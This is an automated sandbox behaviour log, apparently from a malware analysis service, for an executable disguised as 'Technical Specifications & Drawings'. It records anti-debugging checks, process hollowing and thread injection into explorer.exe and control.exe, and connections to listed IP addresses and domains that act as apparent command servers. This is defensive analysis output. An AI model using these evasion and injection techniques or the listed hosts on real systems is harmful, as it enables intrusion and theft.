Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DD294 mov eax, dword ptr fs:[00000030h] 4_2_017DD294
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DD294 mov eax, dword ptr fs:[00000030h] 4_2_017DD294
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h] 4_2_01862D82
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h] 4_2_01862D82
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h] 4_2_01862D82
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h] 4_2_01862D82
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h] 4_2_01862D82
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h] 4_2_01862D82
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h] 4_2_01862D82
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CC577 mov eax, dword ptr fs:[00000030h] 4_2_017CC577
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CC577 mov eax, dword ptr fs:[00000030h] 4_2_017CC577
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_018705AC mov eax, dword ptr fs:[00000030h] 4_2_018705AC
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_018705AC mov eax, dword ptr fs:[00000030h] 4_2_018705AC
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017C7D50 mov eax, dword ptr fs:[00000030h] 4_2_017C7D50
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E3D43 mov eax, dword ptr fs:[00000030h] 4_2_017E3D43
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D4D3B mov eax, dword ptr fs:[00000030h] 4_2_017D4D3B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D4D3B mov eax, dword ptr fs:[00000030h] 4_2_017D4D3B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D4D3B mov eax, dword ptr fs:[00000030h] 4_2_017D4D3B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017AAD30 mov eax, dword ptr fs:[00000030h] 4_2_017AAD30
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01826DC9 mov eax, dword ptr fs:[00000030h] 4_2_01826DC9
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01826DC9 mov eax, dword ptr fs:[00000030h] 4_2_01826DC9
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01826DC9 mov eax, dword ptr fs:[00000030h] 4_2_01826DC9
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01826DC9 mov ecx, dword ptr fs:[00000030h] 4_2_01826DC9
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01826DC9 mov eax, dword ptr fs:[00000030h] 4_2_01826DC9
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01826DC9 mov eax, dword ptr fs:[00000030h] 4_2_01826DC9
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h] 4_2_017B3D34
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h] 4_2_017B3D34
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h] 4_2_017B3D34
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h] 4_2_017B3D34
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h] 4_2_017B3D34
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h] 4_2_017B3D34
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h] 4_2_017B3D34
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h] 4_2_017B3D34
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h] 4_2_017B3D34
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h] 4_2_017B3D34
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h] 4_2_017B3D34
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h] 4_2_017B3D34
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h] 4_2_017B3D34
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0186FDE2 mov eax, dword ptr fs:[00000030h] 4_2_0186FDE2
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0186FDE2 mov eax, dword ptr fs:[00000030h] 4_2_0186FDE2
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0186FDE2 mov eax, dword ptr fs:[00000030h] 4_2_0186FDE2
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0186FDE2 mov eax, dword ptr fs:[00000030h] 4_2_0186FDE2
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01858DF1 mov eax, dword ptr fs:[00000030h] 4_2_01858DF1
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017BD5E0 mov eax, dword ptr fs:[00000030h] 4_2_017BD5E0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017BD5E0 mov eax, dword ptr fs:[00000030h] 4_2_017BD5E0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01878D34 mov eax, dword ptr fs:[00000030h] 4_2_01878D34
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0182A537 mov eax, dword ptr fs:[00000030h] 4_2_0182A537
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0186E539 mov eax, dword ptr fs:[00000030h] 4_2_0186E539
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01823540 mov eax, dword ptr fs:[00000030h] 4_2_01823540
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01853D40 mov eax, dword ptr fs:[00000030h] 4_2_01853D40
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D1DB5 mov eax, dword ptr fs:[00000030h] 4_2_017D1DB5
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D1DB5 mov eax, dword ptr fs:[00000030h] 4_2_017D1DB5
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D1DB5 mov eax, dword ptr fs:[00000030h] 4_2_017D1DB5
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D35A1 mov eax, dword ptr fs:[00000030h] 4_2_017D35A1
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DFD9B mov eax, dword ptr fs:[00000030h] 4_2_017DFD9B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DFD9B mov eax, dword ptr fs:[00000030h] 4_2_017DFD9B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017A2D8A mov eax, dword ptr fs:[00000030h] 4_2_017A2D8A
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017A2D8A mov eax, dword ptr fs:[00000030h] 4_2_017A2D8A
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017A2D8A mov eax, dword ptr fs:[00000030h] 4_2_017A2D8A
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017A2D8A mov eax, dword ptr fs:[00000030h] 4_2_017A2D8A
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017A2D8A mov eax, dword ptr fs:[00000030h] 4_2_017A2D8A
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D2581 mov eax, dword ptr fs:[00000030h] 4_2_017D2581
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D2581 mov eax, dword ptr fs:[00000030h] 4_2_017D2581
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D2581 mov eax, dword ptr fs:[00000030h] 4_2_017D2581
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D2581 mov eax, dword ptr fs:[00000030h] 4_2_017D2581
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h] 4_2_017DAC7B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h] 4_2_017DAC7B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h] 4_2_017DAC7B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h] 4_2_017DAC7B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h] 4_2_017DAC7B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h] 4_2_017DAC7B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h] 4_2_017DAC7B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h] 4_2_017DAC7B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h] 4_2_017DAC7B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h] 4_2_017DAC7B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h] 4_2_017DAC7B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864496 mov eax, dword ptr fs:[00000030h] 4_2_01864496
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864496 mov eax, dword ptr fs:[00000030h] 4_2_01864496
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864496 mov eax, dword ptr fs:[00000030h] 4_2_01864496
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864496 mov eax, dword ptr fs:[00000030h] 4_2_01864496
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864496 mov eax, dword ptr fs:[00000030h] 4_2_01864496
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864496 mov eax, dword ptr fs:[00000030h] 4_2_01864496
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864496 mov eax, dword ptr fs:[00000030h] 4_2_01864496
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864496 mov eax, dword ptr fs:[00000030h] 4_2_01864496
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864496 mov eax, dword ptr fs:[00000030h] 4_2_01864496
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864496 mov eax, dword ptr fs:[00000030h] 4_2_01864496
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864496 mov eax, dword ptr fs:[00000030h] 4_2_01864496
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864496 mov eax, dword ptr fs:[00000030h] 4_2_01864496
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864496 mov eax, dword ptr fs:[00000030h] 4_2_01864496
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017C746D mov eax, dword ptr fs:[00000030h] 4_2_017C746D
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DA44B mov eax, dword ptr fs:[00000030h] 4_2_017DA44B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01878CD6 mov eax, dword ptr fs:[00000030h] 4_2_01878CD6
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DBC2C mov eax, dword ptr fs:[00000030h] 4_2_017DBC2C
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01826CF0 mov eax, dword ptr fs:[00000030h] 4_2_01826CF0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01826CF0 mov eax, dword ptr fs:[00000030h] 4_2_01826CF0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01826CF0 mov eax, dword ptr fs:[00000030h] 4_2_01826CF0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_018614FB mov eax, dword ptr fs:[00000030h] 4_2_018614FB
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h] 4_2_01861C06
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h] 4_2_01861C06
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h] 4_2_01861C06
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h] 4_2_01861C06
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h] 4_2_01861C06
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h] 4_2_01861C06
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 4_2_017E9910
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 109.234.162.62 80
Source: C:\Windows\explorer.exe Domain query: www.mexc-event-partner.site
Source: C:\Windows\explorer.exe Domain query: www.gzkanglongkeji.com
Source: C:\Windows\explorer.exe Network Connect: 107.155.208.43 80
Source: C:\Windows\explorer.exe Network Connect: 184.168.107.80 80
Source: C:\Windows\explorer.exe Network Connect: 67.23.226.119 80
Source: C:\Windows\explorer.exe Domain query: www.kirchhoff-darryl.com
Source: C:\Windows\explorer.exe Network Connect: 67.223.117.72 80
Source: C:\Windows\explorer.exe Domain query: www.boshi-eg.online
Source: C:\Windows\explorer.exe Domain query: www.tomoptique.fr
Source: C:\Windows\explorer.exe Domain query: www.esandcraic.com
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: 1C0000
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Memory written: C:\Users\user\Desktop\Technical Specifications & Drawings.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Thread register set: target process: 3968
Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 3968
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process created: C:\Users\user\Desktop\Technical Specifications & Drawings.exe C:\Users\user\Desktop\Technical Specifications & Drawings.exe
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
